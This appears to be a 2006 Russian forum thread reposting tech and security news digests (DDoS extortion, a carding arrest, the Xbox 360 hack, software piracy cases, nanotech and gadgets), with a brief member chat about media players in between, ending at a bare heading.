В одной из прошлых новостей я писал о Всемирном саммите информационного общества, на котором помимо многих других обсуждалась идея создания интернет-правительства. Обсуждение этой затеи было довольно бурным, идеи чиновников и IT-специалистов разделились, а главное, мнение народа так и не было рассмотрено всерьез. Чтобы это исправить, сайт Securitylab.ru совместно с ЮНЕСКО запустил голосование в Сети, где каждый может отписаться по этому поводу. Голосование состоит из 5-ти вопросов, определяющих, нужно ли такое правительство, какие задачи оно должно решать и каким в общем-то должно быть. Как говорится на Секулабе, полученные в результате данные будут высланы IGF (Internet Governance Forum) - международной организации, занимающейся вопросами пользования Интернетом. Пока рунетчики относятся к предложенной идее или скептически, или отрицательно.

Проголосовать ты можешь, проследовав по ссылке: <http://www.securitylab.ru/form/questions.php?SID=governance>

[пиратская Vista будет некрасивой]

Если тебе нравятся всякие графические навороты и супер-пупер эффекты, то тебе точно придется по душе Vista - очередная ОС семейства Windows, выход которой запланирован на 2006-й год. В системе будет использован новый пользовательский интерфейс, носящий название Aero и включающий такие прибамбасы, как прозрачные и «живые» окна, анимированные переходы между запущенными приложениями и т. д. Но есть одно "НО": всю эту радость ты сможешь лицезреть, только являясь обладателем лицензионной версии. Microsoft решила, что с пиратами можно бороться не только в судебном порядке, и планирует ограничить возможности Висты для халявщиков. Проверку легальности копии будет производить программа Windows Genuine Advantage, каким образом - пока не ясно. Также графических чудес будет лишена дешевая версия висты - Vista Basic. Не могу сказать, что в Интернете из-за этой новости поднялась паника. Всем понятно, что Aero при всех включенных настройках будет жрать кучу машинных ресурсов, так что даже владельцы полноценных копий, скорее всего, вырубят финтифлюшки уже через 10 минут. Конкретно о требовании к системе нового UI пока мало что известно. Представитель Microsoft только сказал, что память должна быть с пропускной способностью не менее 1800 Мбайт/с, объем видеопамяти - не меньше 64 Мб, а размер ОЗУ - 1 Гиг минимум.




[красная угроза]

От братьев наших восточных поступила информация, что на территории Китая стала открыто и весьма активно действовать хакерская группировка, называющая себя «Альянс красных хакеров». Создана она была с одной единственной целью: нести хаос и разрушения сетевым ресурсам США. Альянс уже взял на себя ответственность за десятки тысяч взломов, среди которых оказались и многие ранее нераскрытые. Особенной любовью у «красных» пользуются правительственные сайты. Примечательно то, что китайские кибертеррористы даже не думают прятаться, мало того - открыто приглашают вступить в их ряды и бороться с американским злом. Неофициальные источники утверждают, что хакгруппа поддерживается правительством Китая, правда, вряд ли кто-то возьмется это подтвердить. Вообще, китайцы в Сети последнее время ведут все более агрессивную деятельность против США. Так и до войны недалеко.

[корпоративный страх]

За последний год в России на порядок выросло количество случаев шантажа через Интернет. Но если раньше хакеры сначала добывали компрометирующую или конфиденциальную инфу и грозили ее обнародовать, то теперь все намного проще - они просто угрожают заDDOS'ить сайт или отключить некоторые онлайновые сервисы в случае неуплаты. Как оказалось, информация о 90% таких случаев не доходит до МВД. В наше время многие компании ведут двойную бухгалтерию и попросту боятся, что если они обратятся в милицию, доблестные органы заинтересуются финансовыми делами компании. Да и мало кто сейчас верит в способности отдела «К». Представитель отдела компьютерных преступлений Руслан Стоянов заверил, что дела фирмы при расследовании преступления их мало интересуют, и для поимки хакера просматривать бухгалтерию им не нужно. А вот в Великобритании с этим дела обстоят лучше. Там попросту запрещено утаивать информацию о компьютерном взломе, поэтому практически все такие происшествия доходят до ведома местной полиции.

[фильтрация с последствиями]

В США закончился суд над интернет-провайдером Verizon Communications. Групповой иск против него подали клиенты еще в прошлом году, после того как компания во время фильтрации спама блокировала поступающую почту с некоторых географических зон. Таким образом, люди, ведущие переписку с родными и друзьями на другом конце света, не получили новых писем. Суд присудил выплатить каждому из 5-ти миллионов абонентов Verizon, пользовавшихся на протяжении года ее почтовыми услугами, до $28, а также возместить стоимость сервиса за это время. Результат удовлетворил далеко не всех. Например, фирма «Swift & Graf» расценила свой ущерб в 1,4 миллиона долларов и собирается продолжать судебные тяжбы. Сам же пров себя виновным не считает. Как заявил представитель Verizon, они пытались настроить фильтр как можно оптимальнее, но в процесс возник сбой — с кем не бывает. Следующие слушания по этому делу состоятся в конце июня этого года.

[как работает Билл Гейтс?]

Недавно в журнале Forbes появилась интересная статья, в которой Билл Гейтс рассказывает о своем рабочем месте и условиях. Билли, оказывается, использует сразу 3 монитора: на левом отображается список новых емейлов, на среднем - текст отправляемого сообщения, на правом - старый-добрый эксплорер, которым миллиардер серфит локальную и всемирную сеть. Приходящее мыло поступает через многоуровневую фильтрацию, и в результате остается около 100 писем в день, которые нужно прочитать. Еще кипу писем доставляет потом помощник - это те, которые не прошли фильтр, но могут быть полезными. Вся поступающая почта сортируется им в порядке приоритета, в первую очередь Билл просматривает емейлы с пометкой «срочно». Компьютер главы Microsoft подключен ко внутренней сети компании, и мистер Гейтс активно использует возможности локального поиска. Билл Гейтс практически повсюду носит с собой КПК, где хранит всю важную для себя информацию. В кабинете миллиардера также находится доска, которую он с коллегами использует для мозгового штурма. Сделанные на этой доске записи могут быть тут же преображены в цифровые фотографии и скопированы на компьютер. Раз в год Билл берет для себя «неделю раздумий» - небольшой отпуск, во время которого он знакомится с предложениями и идеями сотрудников по поводу дальнейшего развития Microsoft. Эта "неделя" уже стала, по сути, традиционной и используется Биллом уже 12 лет.

Hi-tech news

Юрий Свидиненко «Lazarus» (kammerer_max@yahoo.com)

К нано-багги прикрутили мотор!

Помнишь, в недавнем выпуске Импланта я рассказывал о четырехколесном нано-багги, который ездил по золотой плоскости? Так вот теперь хитрые ученые из университета Райса смогли прикрутить к этому девайсу настоящий двигатель. Для этого потребовалось переработать конструкцию багги: заменить фуллерены-колеса базовой рамы на молекулы карборанов, содержащие углерод, водород и бор. Ширина рамы наноавтомобиля - 4 нанометра, чуть больше, чем толщина молекулы ДНК. Такая альтернативная конструкция позволила ученым "навесить мотор". Мотор машины представляет собой крестообразную лопасть, установленную в центре рамы, которая, вращаясь, отталкивает ее от пола (все той же золотой подложки). Похоже это на принцип действия древних колесных пароходов, однако, несмотря на древность принципа действия, он все же остается довольно эффективным в наноразмерном диапазоне. "Лопастной нанодвигатель", правда, нереверсивный - он может вращаться только в одну сторону, поэтому машинка будет ехать только вперед. Лопасти питаются световой энергией, поэтому управлять отдельными багги можно с помощью лазера. Такие машинки просто необходимы при организации молекулярных конвейеров и транспортных линий, которые перемещают промежуточные продукты в нанофабриках будущего. Или же представь себе новое реалити-шоу: заезд на нано-багги по пересеченной местности smile.gif Обгони Васю Пупкина под микроскопом, или он обгонит тебя!

Карманный меч джедая

У тебя уже, наверно есть лазерная указка, и ты неоднократно пускал зайчики и рисовал разные рожи на стенах и на своих товарищах. Однако если бы у тебя была лазерная указка Wicked Laser, то такие игры привели бы к плачевным результатам. Этот лазер - настоящая мини-лазерная пушка: его мощность составляет (в зависимости от модели) от 40 милливатт до 0,4 Ватт! И это при размерах 2 см в диаметре и 20 см в длину. Светят лазеры в зеленом и синем видимом диапазоне света. Несмотря на малые размеры, такой игрушкой можно поджечь бумагу, пробить воздушный шарик или ослепить (навсегда) человека. Да что там шарики! Им можно подсветить низколетающий спутник, так как дальность действия луча лазера - 193 километра. И это все при стоимости девайса от 100$ (самый маломощный) до 2х килобаксов (серия Spyder с мощностью ик-диода излучателя 1 Вт). Компания говорит, что это - самый мощный карманный лазер, доступный на потребительском рынке. Изначально сверхкомпактные лазеры без сторонних блоков питания и охлаждения предназначались не для прожигания дырок в товарищах, а для лазерных шоу и других развлечений.

Оцифрованный вирус

Вирусы в компе - не новость. Однако на этот раз в суперкомпьютере появился не простой вирус, а настоящий природный. Уже много лет биологи мечтают создать поатомную цифровую модель како-го нибудь оганизма с тем, чтобы его затем поселить в компьютере и наблюдать за его развитием и жизнью. И вот, это, наконец, им удалось. В качестве цифрового жителя выбрали один из простейших вредителей - круглый вирус табачной мозаики. Его размер составляет всего около 20 нм. Свое название он получил за то, что не может даже самостоятельно взять под контроль клетку и размножается только в тех клетках, которые уже атакованы вирусом табачной мозаики, который часто поражает сельскохозяйственные культуры, в особенности томаты. Структура всех его белков давно известна, осталось всю эту инфу вручную набить в протеиновой проге-моделлере и перенести в суперкомпьютер. Пока модель не позволяет проследить за поведением вируса в клетке, поскольку для этого понадобилось бы смоделировать внутриклеточную среду. Однако расчет, выполненный в американском Национальном центре суперкомпьютерных приложений (NCSA), позволил в течение короткого отрезка модельного времени следить за динамикой вируса, когда он представлен самому себе. Ждем-с: не загорами оцифрованная модель бабы Клавы smile.gif

Настольный ДВС

Выбрось все свои старые безделушки: маятниковые часики, дельфинчиков и глобусы, качающиеся от магнитов. Британская компания Gyroscope.com предлагает тебе реально крутой девайс: работающий настольный двигатель внутреннего сгорания! Правда, "всего" за 621$. Но зато что ты получишь: настоящий работающий V-Twin с медным колесом-маховиком, с полированным ободом и хромированными выхлопными трубами. Высота этого двигателя составляет 24 сантиметра, длина - 18 сантиметров, а ширина - 15 сантиметров. Диаметр маховика - 12,3 сантиметра. А вес этого монстра с подставкой и маленьким топливным баком - 2,5 килограмма. Все подвижные элементы мотора (коленчатый вал, поршни, шатуны и крейцкопфный механизм, клапаны) хорошо уравновешены, так что вибрации практически нет. А коленвал вращается на настоящих шариковых подшипниках. Система зажигания работает от пьезо-кристалла, создающего высокое напряжение, так что никаких батареек не требуется. Для запуска достаточно повернуть кнопку (кран) на бачке и покрутить рукой маховое колесо. Газ начнет впрыскиваться, свечи "сверкать", в общем - полный вперед. Можешь даже в свободное от работы время устанавливать его на велик - чтобы зря не пылился на столе smile.gif
Доктор, а я вас вижу!

Если у тебя серьезные проблемы со зрением от догих часов сидения за железным другом, то не волнуйся: доктор Лаксман Саджер из университета Иллинойса в Чикаго вскоре тебе поможет. Он создал прототип внутриглазного микроимплантата, который может существенно улучшить зрение пациента. Но ты уже слышал о подобных девайсах, что же нового нам предлагают сейчас? Дело в том, что большинство подобных имплантов при работе нагревают сетчатку глаза, вызывая гибель ее клеток и дальнейшее медленное атрофирование зрения. Нагрев сваязан с передачей электронных импульсов напрямую в нерв. Но хитрый доктор хорошо учил в универе биологию и знает, что информация передается не только электричеством, но и специальными химсоединениями - нейромедиаторами. Так вот, новый чип, при попадании на него света, освобождает порцию нужных веществ, хранящихся внтури чипа - и, вуаля, ты снова видишь свою любимую бабушку. Чип представляет собой диск диаметром 1.5 миллиметра и толщиной 15 микрон. В такой маленький девайс доктор исхитрился всунуть и солнечные батареи, от которых он работает. Так что включить насколько дополнительных пикселей в твоем глазу скоро не будет проблемой.

Нотер на сухом алюминии и воде

Проблема с потерей заряда батарейки на нотере, когда розетки рядом нет, тебе, наверняка, знакома. Японцы предлагают заменить проклятые батарейки на аппарат, который ест чистый алюминий и... воду, выдавая при этом честное питание для нотера. Сам аппарат представляет собой обычный топливный элемент с с необычным источником водорода. Он не требует заправки водородом и даже - спиртом (как первые серийные топливные элементы для переносной электроники). Вместо этого он потребляет порошок алюминия и воду в специальных картриджах. Как ты не знаешь из уроков химии, чистый алюминий, лишенный своей обычной оксидной пленки, даже при комнатной температуре бурно реагирует с водой с выделением водорода. Блок Hitachi Maxell с габаритами 16 х 10 х 6 сантиметров и весом 920 граммов развивает продолжительную мощность в 10 ватт и пиковую - 20 ватт. Напряжение составляет 7,4 вольта. 20 граммов алюминия обеспечивают 4-5 часов работы нотера! Благодаря специально разработанной технологии производства "активных" алюминиевых частиц, выделение водорода из воды на один грамм использованного алюминия в батарейке близко к теоретическому пределу. Инженеры из Hitachi уверены, что такие системы можно будет еще уменьшить, увеличив также и мощность (примерно до 100 ватт), а для производства алюминиевых картриджей можно перерабатывать дешевый лом. Кстати, большинство старых советских кастрюль сделано из него, родимого...
Видео на ходу

Хочешь, идя по улице, смотреть новый фильм? Это теперь более чем возможно с новым кибердисплеем от Kopin. Гаджет, называемый Kopin CyberMan GVD510-3D, способен воспроизводить перед твоими глазами высококачественное трехмерное изображение на виртуальном 40-дюймовом экране, который как бы расположен на двухметровом расстоянии от глаз. Новинка нацелена, в основном, на заядлых геймеров. Основа гаджета - цветные 0,44-дюймовые микродисплеи Kopin CyberDisplay. Ранее они использовались только в военных системах визуализации данных (например, шлемы пилотов истребителей). Кибердисплей характеризуется VGA-разрешением 640 x 480 пикселей, низким энергопотреблением и способностью отображать 16,7 млн. цветов. При этом Kopin CyberMan GVD510-3D имеет совместимость с платформой Windows, а также может использоваться с игровыми консолями Microsoft Xbox (включая Xbox 360) и Sony PlayStation 2. CyberDisplay характеризуется высокой плотностью пикселей на квадратный дюйм, что позволило создать устройство с большим графическим разрешением. А то, что дисплей имеет низкую стоимость (в пределах 300$, в зависимости от модели), делает видеоочки доступными среднему геймеру.

Башня табака выростет к 2009 году

Небоскребы - небоскребам рознь. И это еще раз подтверждают китайцы в новом проекте здания национальной табачной компании (CNTC) в городе Гуаньджоу. Эта уникальная архитектурная конструкция не будет потреблять электричество из городской сети вообще! Такая архитектура называется 0-здание, или здание с 0-м балансом энергии. Проектант - известная чикагская архитектурная компания Skidmore, Owings & Merrill (SOM) предусмотрела интересное инженерное решение, позволившее построить башню. 300-метровая 69-этажная "Башня жемчужной реки" (Pearl River Tower) имеет ряд плавных фасадов, направляющих ветер в технические этажи, где располагаются ветрогенераторы, обеспечивающие электроэнергией всю конструкцию. Кроме этого, будет выполнено специальное двойное остекление южного фасада (с вентиляцией между стёкол), способствующее снижению нагрева здания. Но и это еще не все. Для служащих придуманы специальные автоматические жалюзи, поворачивающиеся на нужный угол по мере путешествия Солнца по небу и также - открывающиеся в пасмурную погоду для увеличения естественного освещения офисов. Все вышеперечисленные методы снизят затраты на кондиционирование гиганта. В итоге, сэкономив на энергии в мелочах и испльзовав даровую энергию ветра, китацы имеют шанс стать первой нацией, построившей полностью энергонезависимый небоскреб.

Анализы за 2 минуты

Сколько времени надо, для того, чтобы получить анализ крови в поликлинике? Правильно, дня три. Нам же предлагают, с помощью микрожидкостного чипа, проделать всю процедуру всего за две минуты. Правда, без медсестры и лаборатории. Но в космосе времени всегда в обрез, и космонавтам нужно знать срочно, какие у них показатели крови, чтобы ненароком не получить смертельную дозу облучения. Для них и придумали новый девайс. Настоящая лаборатория-на-чипе с микротрубками и механоэлектрическими вентилями, способна сортировать по капле крови проводить анализ. Вначале капля крови поступает в смесительный резервуар, в котором она смешивается с анти-коагуляторами, препятствующие ее свертыванию. Затем в специальный контейнер, где кровь «разжижается», что позволяет затем посчитать отдельные клетки. После разбавления крови образец поступает в сепаратор, где клетки отделяются друг от друга по размерам и направляются по отдельным конвейерам далее. И вот, устройство, не превышающее размерами мобильный телефон, разделяет и идентифицирует отдельные компоненты крови: эритроциты (красные кровяные тельца), белые кровяные тельца, липиды, белки и кислород. Ученые уверены, что анализатор можно переоборудовать для идентификации разных молекул, вирусов и бактерий, что позволит даже обнаружить различные болезни: вирусный гепатит, СПИД или туберкулез. И все это может гаджет размером с мобилу. Круто?

Клава для геймера

Если ты заядлый геймер и тебе не жалко 100$ - то клавиатура Logitech G15 Gaming Keyboard точно для тебя! Подсветка клавиш, выносной складывающийся ЖК-экран и USB-подключение облегчат твою жизнь во многих играх. Так, например, в Q4 можно вывести на ЖК экран инфу о боеприпасах и настроить дополнительные кнопки под особенности игры. Если же ты играешь в квесты или другие игры, где боеприпасы не играют существенную роль - на экранчик можно вывести аську или почтовые заголовки - особенно это ценно на рабочем месте wink.gif. Еще одни плюс клавы - беспроводность, т.е. ты можешь таскать ее по дому или офису беспрепятственно. Ну и 18 программируемых добавочных кнопок это уже как бонус. Их, например можно настроить на кастование спеллов в World of Warcraft. Или же добавить собственные сложные макросы. Естественно, что кнопок управления видео/аудио и других, уже привычных в мультимедиа-клавах, никто не отменял. Гаджет из серии мелочь, а приятно.








Автор: Tier Nov 16 2006, 18:20

фото некоторые читают я точно не знаю какой брать, есть даже текст берут, ессно видео берут и именно видео дох форматов и можно видео в него писать с телека или еще откудаво

Автор: Metallica Nov 16 2006, 20:54

Цитата(Tier @ Nov 16 2006, 19:20) *

фото некоторые читают я точно не знаю какой брать, есть даже текст берут, ессно видео берут и именно видео дох форматов и можно видео в него писать с телека или еще откудаво

Так этож крутая вещщщщщщьььь';)'

Автор: Tier Nov 16 2006, 20:59

она и стоит минимум 10 000, это на 30гб, а на 160гб, там ваще ппц сколько стоят

Автор: Metallica Nov 16 2006, 21:30

Владимир никалаевич а зачем тебе на 160 черезчур

Автор: Tier Nov 16 2006, 21:32

спасибо что думаеш что у меня есть денег на 160)))
я н а30 беру, но на 160 лучше, можно было бв там хранить резервные копии наших дисков и харда

Автор: Metallica Nov 17 2006, 09:51

Ну и прально

Автор: Metallica Nov 17 2006, 15:58

Банкоматный триллер

Поймать кардеров – дело нелегкое, тем более, если они осторожничают. Но в прошлом месяце наша доблестная милиция доказала, что для них нет ничего невозможного. Арестованными кардерами стала четверка студентов финансового факультета одного из столичных вузов. Парни уже давно раздумывали, как бы разжиться баблишком побыстрее, побольше и без особого труда. И тут удача подвалила: познакомились в Интернете с американскими «коллегами», которые имели доступ к информации о кредитках буржуев. Все, что нужно было сделать, – изготовить поддельные креды и обналичить с их помощью доллары в банкоматах. Добычу делили по справедливости. Сказано – сделано. Получив нужные данные и изготовив кредитные карты, студенты воспользовались десятью банкоматами и за несколько месяцев сняли до 500 тысяч баксов. Когда жертвы обнаружили пропажу, пожаловались в американскую полицию, а та, узнав, куда утекло бабло, связались с нашим УБЭПом. Органы довольно быстро определили, с каких банкоматов шла обналичка и, установив за ними наблюдение, арестовали кардеров во время очередной их попытки снять сливки. После того как на штаб-квартире студентов нашли более чем достаточно улик (65 тысяч зелени, дампы, фальшивые креды и оборудование по их изготовлению, инфа о счетах), парни долго не ломались и выдали своих сообщников. Сейчас американскими поставщиками занимается USA Police, а русским горе-кардерам остается только сушить сухари. Сидеть им, судя по всему, придется долго.

Chaos Constructions 2006 coming soon

Если ты регулярно читаешь рубрику «Сцена», то должен знать о фестивале компьютерного искусства Chaos Constructions, который ежегодно проводится в Питере в здании ЛДМ. Предыдущие CC показали, что сценеры, готовые принять участие и показать себя, еще есть. Поэтому Конструкция Хаоса состоится и в этом году, причем очень скоро - с 26 по 27 августа. На этот раз организаторы обещают бесплатный вход всем, кто придет со своим компьютером. Тебе предоставят место, розетку и быстрый выход в Интернет – что еще надо любителю халявы и порно? smile.gif. Если наберется достаточно народу, то можно будет организовать геймерский турнир. Создание LAN, впрочем, не является главной целью CC. Основным событием будут compo – конкурсы по различным демосценовым направлениям: демо, музыка, графика, mobile, игры. В 2006 году к ним добавятся новые номинации. Веб-дизайнеры будут соревноваться за приз "Лучший веб-сайт", фотографы смогут показать в рамках конкурса свои фотосессии, будет компо для графоманов (на лучшее реалтаймовое освещение пати), обладателей старого железа и даже сетевых админов (найти уязвимость в сервере, снять защиту с проги и т.д.). В общем, даже если ты неудачник, который ничего не умеет и не знает, конкурс найдется даже для тебя. Место проведения остается тем же – торговый комплекс ЛДМ, а цена билета на два дня составит 300 рублей (если заказать на сайте — выйдет дешевле). Предупреждаю сразу, оргкомитет не любит хулиганов, и пронести спиртное, наркотики и оружие тебе не дадут. Зато можно будет вволю оттянуться после официальной части, на афтерпати


Chaos Constructions – на данный момент крупнейшее демопати в стране, на которое приезжают сценеры не только из России, но из Украины и даже Европы. Говорят, там можно увидеть даже живого майндворка smile.gif. В общем, двигай на http://cc6.org.ru — там ты узнаешь обо всем подробнее.

Xbox 360 hacked

Год назад Microsoft презентовала миру свою новую игровую приставку Xbox 360 на трехъядерном процессоре PowerPC, с 512 Мб DRAM, 20 Гиговым HDD и другими наворотами. Понятное дело, компания приложила все усилия, чтобы не допустить расцвета пиратства на этой консоли, снабдив новинку непробиваемой защитой. И вот, месяц назад, в Интернете впервые появилось известие, что Xbox хакнут. Умелец с сайта XboxHacker.net, некий Commodore4eva, выложил инструкцию с изощренным способом обойти защиту. Те, кто ждет хелпа в духе «нажми кнопку и получи результат», могут расслабиться – придется покопаться в прошивке бокса, и далеко не факт, что после этого система вообще будет нормально грузиться. Но если все сделать правильно, то ты сможешь загружать не только лицензионные диски, но и болванки с копиями консольных шутеров. Найти рекомендации хакера можно по этой ссылке: http://www.xboxhacker.net/index.php?option=com_smf&Itemid=33&topic=779.0

Microsoft за свободное ПО

Думаю, если провести опрос по теме: «Враг номер один свободного ПО», то не последнее место там займет Microsoft. Действительно, старина Билли за бесплатно даже скринсейвер не выпустит. Так что новость о том, что компания запустила в Сети новый сервис, поддерживающий freeware, удивила многих. Называется он Codeplex и является онлайновым хранилищем исходников свободного ПО. Программисты могут заливать свои наработки или скачивать чужой код, искать нужные проги в обширной базе, просматривать самые популярные проекты. Программерский рай, не меньше. Правда, пока он находится в стадии бета-тестирования, а заценить модный сервис ты сможешь здесь: http://www.codeplex.com. Кстати, это не первый шаг Microsoft в мир опенсорс: недавно компания открыла собственную лаборатория по изучению freeware. Так, глядишь, и Windows станет распространяться по лицензии GPL.

Око за око

Со спамерами нынче шутки плохи. Примером тому стал случай, который произошел с Blue Security – американской фирмой, специализирующейся на компьютерной безопасности. Недавно парни из BS придумали способ, который, по их словам, способен положить конец спамерскому злу. Имя ему – Blue Frog. На самом деле это простенькая программа, которая ищет в мыле юзера спамовые сообщения, находит в них ссылки на рекламируемые сайты и затем отсылает от имени юзера жалобы владельцам этих ресурсов. Получив очередную тысячу таких жалоб, клиенты спамеров, по идее, сто раз подумают перед тем, как обратиться к ним за помощью снова. Blue Security решила продемонстрировать эффективность своей проги наглядно, и разослала кучу мессаг представителям спам-сообщества. Стоит ли говорить, что тем такой подход не понравился, и ответа не пришлось долго ждать. Спамерская мафия натравила на BS десятки тысяч компьютеров-зомби, заDDoSив бедную фирму по самые помидоры. Сайт загнулся достаточно быстро. Помимо этого, спамеры прислали на емейл фирмы предложение немного поумерить пыл, иначе следующими окажутся клиенты Blue Security. Отправка жалоб на спамерские адреса была немедленно остановлена, но так просто "безопасники" это оставлять не стали и обратились к ФБР. Сейчас идет разбор полетов, но я, честно говоря, сомневаюсь, что федералы тут помогут.
Директор, ставь лицензию и спи спокойно

Не повезло генеральному директору ООО «МПарк Телеком» Ивану Галаничеву. В Москве — несметное количество фирм, где лицензию в упор не признают, а поймали его. О том, что только на 8 компьютерах из 13, задействованных в фирме, стоит лицензионный Windows, стало известно еще в ноябре 2005 года, в результате проведенного на офис рейда. Уголовное дело по статье 146 (Нарушение авторских прав) было возбуждено в январе, а приговор объявлен в мае. Суд постановил шефу выплатить 30 тысяч рублей государству и 146 тысяч — компании Microsoft. И это не единственный прецедент: судебных дел по 146-й статье в последнее время становится все больше. Милиция как-то сдружилась с обладателями прав и активно им помогает. По этой статье, кстати, предусмотрен не только штраф и принудительные работы, но и срок до 2-х лет. Правда, в тюрьму за это не сажали, но все идет к тому. Мне даже страшно подумать, что могут найти милиционеры, если проведут совместный с ФБР рейд на мой компьютер.

5 месяцев и 40 тысяч за троян

Нехилое наказание впаяли 34-летнему админу министерства образования в американском штате Вирджиния за установку трояна на компьютер шефа. Чуваку придется провести 5 месяцев в тюрьме, потом еще 5 под домашним арестом, потом еще 3 года мотать условно, да еще и выложить штраф в размере 40 тысяч у.е. Суть в том, что дело его проходило в рамках недавно принятой программы «нулевой терпимости», предусматривающей серьезное наказание за любое незаконное вторжение в правительственные компьютеры. А ведь Кеннет Квак даже не пытался использовать полученную инфу для наживы – просто читал время от времени письма босса, обсуждал с коллегами его переписку. Думаю, в тюрьме он осознает, что должность отвечающего за IT-безопасность на фирме заключается немного не в этом. Благо времени на размышления будет.

Kodak спамит своих клиентов

То, что спамерской деятельностью занимаются многие крупные компании, ни для кого не секрет. Недавно стало известно, что одной из таких фирм является Kodak, которая полтора года назад разослала 2 миллиона нежелательных сообщений посетителям своего сайта. Действия фото-гиганта возмутили честный американский народ, и на компанию подали коллективный иск в суд. Дело это продвигалось достаточно медленно, и закончилось признанием Kodak’ом своей вины, с готовностью выплатить штраф 26 тысяч долларов. По словам представителей компании, произошло все в результате технического сбоя. Проблема теперь исправлена, и инцидент больше не повторится. Что за сбой, правда, в Kodak’е не уточнили. В США сейчас к коммерческому спаму относятся особенно строго: в сообщении должна быть пометка о рекламном характере письма, обратный адрес и возможность отписаться от рассылки.

Русские ученые против зарубежного ПО

Уж не знаю, чем не угодили нашим ученым американские программеры, но месяц назад они скооперировались и написали президенту РФ Владимиру Путину официальное обращение. В нем они выразили беспокойство по поводу нынешнего состояния информационной безопасности в России и предложили во всех критических системах отказаться от использования зарубежного ПО, а вместо этого писать софт для себя самостоятельно. Подписали бумагу члены РАЕН, сотрудники нескольких ведущих институтов, отдельные депутаты и другие ученые мужи. В качестве аргумента был приведен тот факт, что из-за купленного у буржуев софта практически вся информационная система страны находится под контролем иностранных структур. К тому же вместо того, чтобы поддержать, как говорится, отечественного производителя, правительство отдает дань американским магнатам. С одной стороны, составители обращения по-своему правы, но с другой - многие программные пакеты не имеют аналогов в России, и их замена потребует кучи времени и средств. В общем, остается только гадать, как Владимир Владимирович отреагирует на послание. А пока ты можешь почитать текст обращения здесь: http://www.cnews.ru/downloads/orbash.doc

Собак тренируют вынюхивать варез

Не зря существует поговорка: «Нюх как у собаки». Верный друг человека способен разнюхать грамм кокаина в набитой доверху торбе, и этим собачьим свойством уже не первый год пользуются таможенники и полиция всех стран. Но если раньше собак тренировали в основном на поиск взрывчатки и наркотиков, то теперь их новое применение – поиск пиратских дисков. Первыми ласточками, в смысле псами, способными вынюхать, где дискета зарыта, стали Lucky и Flo – два добряка-лабрадора. 8 месяцев Федерация по борьбе с нарушением авторских прав (FACT) тренировала собачек, чтоб они различали запах болванки и, когда обучение подошло к концу, провели экзамен в лондонском аэропорту Stansted. Оба песика справились с ним блестяще, из двух сумок выбрав именно ту, в которой был спрятан DVD. Правда, научить собак различать по запаху лицензионные диски от нелицензионных в FACT пока не смогли. Но ведь это только начало.

Hi-tech news

Юрий Свидиненко «Lazarus» (kammerer_max@yahoo.com)

Корейская киберподруга

Ты, может, уже слышал о разных киберподелках на тему замены прекрасной половины человечества. Так вот, на нашей планете появилась вторая женщина-андроид. Первую представили японцы в 2003 году. Вторая же киберподруга - собственная разработка Южнокорейского института индустриальных технологий (Korea Institute of Industrial Technology — KITECH). Второй в мире андроид получил имя EveR-1. Первая половина названия — это имя Ева (Eve), а буковка "R" позаимствована у слова "robot". Подруга обошлась создателям в 3000 тысячи с лишним долларов. Она успешно прикидывается 20-летней кореянкой в натуральную величину: ее рост — 1,6 метра, а вес — около 50-ти килограммов. Только есть один нюанс: девушка-андроид не может передвигаться, так как ее нижняя часть туловища прикована к креслу. Зато она может двигать верхней половиной тела и руками, демонстрировать четыре выражения лица (радость, гнев, горе и счастье) с помощью 15-ти крошечных двигателей, "понимать" 400 слов, устанавливать контакт "глаза в глаза" и, наверное, что-то еще. К концу этого года KITECH обещает показать EveR-2, которая будет способна стоять и вообще являть собой более совершенную версию в плане "зрения" и выражения эмоций. Ожидается, что машины вроде EveR смогут служить гидами, выдавая информацию в универмагах и музеях, а также развлекать детишек.

Кресло для танкистов

Если ты в детстве хотел быть танкистом, то кресло Tank Chair как раз для тебя! Гениальная и простая идея - приделать настоящие танковые гусеницы к обычному креслу. Это реализовал один Кулибин из США и получил универсальный девайс как для любителей покататься, так и для инвалидов. На этом монстре можно путешествовать через грязь, снег, песок, преодолевать небольшие овраги и даже спускаться и подниматься по лестницам! Выдерживает это чудо тело весом 120 килограмм. Сделано и продано уже около 10-ти таких машин. После этого Кулибин основал компанию TankChair, которая и занимается дальнейшим распространением кресел-танков.

Моторы, приводящие кресло в движение, взяты от боевых роботов, выпускаемых компанией NPC robotics. Танк-кресло можно заказать на специальной веб-страничке (http://www.tankchair.com). Как говорит сам Кулибин, он подарил одно кресло реабилитационной больнице для парализованных, после чего там организовалась постоянная очередь желающих покататься. Да, думаю, ты и сам был бы не прочь smile.gif.

Новый ультратонкий мобильник от Samsung

Казалось бы: как можно делать телефоны еще меньше и при этом оснащать их новыми функциями? Наверное, компания Samsung это знает хорошо, так как на недавно прошедшей московской выставке "Связь-Экспокомм 2006" она представила самый тонкий в мире мобильный телефон — SGH-X820. Толщина корпуса новинки составляет всего 6,9 миллиметра. Другие параметры: длина — 113 миллиметров, ширина — 50 миллиметров, вес — 66 граммов. Кстати, низкий вес, среди прочего, обеспечен благодаря прочному корпусу из пластмассы со стекловолоконным наполнителем. Несмотря на столь скромные габариты и малый вес, телефон хорошо оснащен. В частности, здесь есть 2-мегапиксельная фотокамера, с возможностью записи видео в стандартах MPEG-4 и H.263. Неудивительно, что встроенная память телефона довольно велика и составляет 80 мегабайт. Дисплей — 1,9 дюйма, 176 х 220 точек, 262 тысячи цветов. Телефон понимает файлы MP3, AAC, ACC+, AAC+(e) и WMA, может просматривать документы и обладает интерфейсами Bluetooth, USB и PictBridge. А также SGH-X820 имеет видеовыход. Не брезгует мобила и Интернетом (GPRS). Как говорят специалисты компании, плотная упаковка элементов телефона — заслуга новой технологии монтажа "Умная поверхность" (Smart Surface Mounting Technology — SSMT). Все хорошо, только одно пугает - возможная цена, которая еще не объявлена

Термопаста из нанотрубок

